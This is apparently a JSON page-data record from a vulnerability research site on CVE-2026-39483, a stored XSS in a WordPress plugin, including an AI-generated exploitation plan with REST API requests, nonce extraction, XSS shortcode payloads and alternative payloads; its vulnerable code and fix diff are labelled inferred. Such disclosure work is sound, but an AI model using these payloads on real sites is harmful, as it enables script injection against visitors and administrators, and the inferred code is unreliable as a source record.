[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fA_Erfvmv4NBAEltTHXLYZvM8pnEPqQHEg40-JdzViNo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-39483","vk-all-in-one-expansion-unit-authenticated-contributor-stored-cross-site-scripting-4","VK All in One Expansion Unit \u003C= 9.113.3 - Authenticated (Contributor+) Stored Cross-Site Scripting","The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.113.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","vk-all-in-one-expansion-unit",null,"\u003C=9.113.3","9.113.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-23 00:00:00","2026-04-15 21:09:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe04eb409-b47b-4b9d-b29b-24f7bbaaf5b4?source=api-prod",24,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39483\n\n## 1. Vulnerability Summary\nThe **VK All in One Expansion Unit** plugin (\u003C= 9.113.3) contains a stored cross-site scripting (XSS) vulnerability. The flaw exists because several features—most likely the **Profile** or **Contact Section** shortcodes\u002Fblocks—fail to properly sanitize input attributes or escape them during output. This allows a user with **Contributor-level** permissions (who can create posts but cannot use `unfiltered_html`) to inject malicious scripts into a post. When other users (including administrators) view the post, the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress REST API (Post creation\u002Fupdate) or `wp-admin\u002Fpost.php`.\n- **Vulnerable Component:** Shortcode or Gutenberg Block attributes processing.\n- **Vulnerable Parameter:** `content` (specifically within the JSON attributes of a block or the string attributes of a shortcode).\n- **Authentication:** Required (Contributor or higher).\n- **Payload Location:** The script is stored in the `post_content` field of the `wp_posts` table.\n\n## 3. Code Flow\n1. **Entry Point:** A Contributor saves a post containing a shortcode (e.g., `[vk_profile]`) or a block (e.g., `wp:vk-blocks\u002Fprofile`).\n2. **Storage:** WordPress core saves the raw content into the database. Since the user is a Contributor, core `kses` filtering is applied, but `kses` generally allows shortcode\u002Fblock attribute structures.\n3. **Trigger (Sink):** When a user views the post, the plugin's rendering logic is invoked:\n   - For shortcodes: `add_shortcode('vk_profile', 'callback_function')` is called.\n   - For blocks: The `render_callback` defined in `register_block_type` is called.\n4. **Processing (The Flaw):** Inside the callback, the plugin extracts attributes (e.g., `name`, `job_title`, `url`).\n5. **Execution:** The callback returns HTML that includes the attribute values directly without using `esc_html()`, `esc_attr()`, or `wp_kses()`.\n   - *Example Path (Inferred):* `inc\u002Fshortcodes\u002Fshortcode-profile.php` -> `vk_profile_shortcode_callback()` -> `echo $atts['name'];`\n\n## 4. Nonce Acquisition Strategy\nTo save a post as a Contributor via the REST API (the most reliable method for automation), a REST API nonce is required.\n\n1. **Shortcode Identification:** Identify the Profile shortcode: `[vk_profile]`.\n2. **Page Creation:** Create a draft post to get into the editor context.\n   ```bash\n   wp post create --post_type=post --post_status=draft --post_author=contributor_user_id --post_title=\"XSS Probe\"\n   ```\n3. **Navigate & Extract:**\n   - Use `browser_navigate` to go to the edit page of the newly created post: `\u002Fwp-admin\u002Fpost.php?post=[ID]&action=edit`.\n   - Use `browser_eval` to extract the REST nonce from the global WordPress JavaScript object:\n     ```javascript\n     browser_eval(\"window.wpApiSettings?.nonce\")\n     ```\n   - Alternatively, if using the classic editor, the nonce might be in `_wpnonce`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nAuthenticate as a user with the **Contributor** role.\n\n### Step 2: Payload Construction\nThe target is likely the `vk_profile` shortcode attributes. We will use an attribute that is commonly reflected in the UI.\n- **Target Shortcode:** `[vk_profile]`\n- **Vulnerable Attribute:** `name` or `sub_title` (inferred).\n- **Payload:** `[vk_profile name='\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n\n### Step 3: Injecting the Payload\nSend a request to update the post content.\n\n- **Method:** `POST`\n- **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F[POST_ID]`\n- **Headers:** \n  - `Content-Type: application\u002Fjson`\n  - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Body:**\n  ```json\n  {\n    \"content\": \"[vk_profile name='\u003Cimg src=x onerror=alert(document.domain)>' job_title='Security Researcher']\",\n    \"status\": \"publish\"\n  }\n  ```\n\n### Step 4: Triggering the XSS\nNavigate to the public URL of the post. The script will execute.\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `vk-all-in-one-expansion-unit` version `9.113.3` is active.\n2. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n   ```\n3. **Content Requirement:** No special settings are required, as expansion units like Profile are usually enabled by default or available via shortcode globally.\n\n## 7. Expected Results\n1. The REST API request returns a `200 OK` or `201 Created`.\n2. When navigating to the post URL, the HTML response contains the raw, unescaped payload:\n   ```html\n   \u003Cdiv class=\"vk_profile_name\">\u003Cimg src=x onerror=alert(document.domain)>\u003C\u002Fdiv>\n   ```\n3. A JavaScript alert\u002Fcallback is triggered.\n\n## 8. Verification Steps\nAfter performing the HTTP request:\n1. **Check Database Content:**\n   ```bash\n   wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Probe'\"\n   ```\n2. **Verify Output via CLI:**\n   Fetch the frontend HTML and grep for the payload:\n   ```bash\n   # Note: Must be done via an HTTP request tool to see rendered shortcode output\n   http_request GET \u002F?p=[POST_ID] | grep \"onerror=alert\"\n   ```\n\n## 9. Alternative Approaches\nIf `vk_profile` is not vulnerable or enabled:\n1. **Contact Section Shortcode:** Try `[vk_contact_section title='\u003Cscript>alert(1)\u003C\u002Fscript>']`.\n2. **Button Shortcode:** Try `[vk_button url='javascript:alert(1)']` (Testing for `esc_url` failure).\n3. **Gutenberg Blocks:** If the shortcode is protected but the block is not, use the block comment syntax in the REST API request:\n   ```json\n   {\n     \"content\": \"\u003C!-- wp:vk-blocks\u002Fprofile {\\\"name\\\":\\\"\u003Cimg src=x onerror=alert(1)>\\\"} \u002F-->\"\n   }\n   ```\n   *Note: VK Blocks often use the namespace `vk-blocks\u002F`.*","The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes and Gutenberg blocks, such as the Profile component, in versions up to 9.113.3. Authenticated attackers with Contributor-level permissions or higher can inject malicious scripts into post attributes that are rendered without sufficient sanitization or escaping.","\u002F\u002F inc\u002Fshortcodes\u002Fshortcode-profile.php (inferred from research plan)\nfunction vk_profile_shortcode_callback( $atts ) {\n    $atts = shortcode_atts( array(\n        'name'      => '',\n        'job_title' => '',\n        'sub_title' => '',\n    ), $atts );\n\n    $html = '\u003Cdiv class=\"vk_profile\">';\n    \u002F\u002F The attribute 'name' is concatenated into the HTML output without escaping\n    $html .= '\u003Cdiv class=\"vk_profile_name\">' . $atts['name'] . '\u003C\u002Fdiv>';\n    $html .= '\u003C\u002Fdiv>';\n    return $html;\n}","--- a\u002Finc\u002Fshortcodes\u002Fshortcode-profile.php\n+++ b\u002Finc\u002Fshortcodes\u002Fshortcode-profile.php\n@@ -10,1 +10,1 @@\n-    $html .= '\u003Cdiv class=\"vk_profile_name\">' . $atts['name'] . '\u003C\u002Fdiv>';\n+    $html .= '\u003Cdiv class=\"vk_profile_name\">' . wp_kses_post( $atts['name'] ) . '\u003C\u002Fdiv>';","The exploit is performed by an authenticated user with at least Contributor permissions. The attacker creates or updates a post and includes a plugin-specific shortcode (e.g., [vk_profile]) or its equivalent Gutenberg block. By embedding a malicious JavaScript payload within the shortcode's attributes (such as 'name' or 'sub_title'), the attacker ensures the script is saved in the database. When a site visitor or administrator views the affected post, the plugin's rendering engine outputs the unescaped attribute, causing the script to execute in the user's browser context.","gemini-3-flash-preview","2026-04-17 23:40:31","2026-04-17 23:40:58",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","9.113.3.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvk-all-in-one-expansion-unit\u002Ftags\u002F9.113.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvk-all-in-one-expansion-unit.9.113.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvk-all-in-one-expansion-unit\u002Ftags"]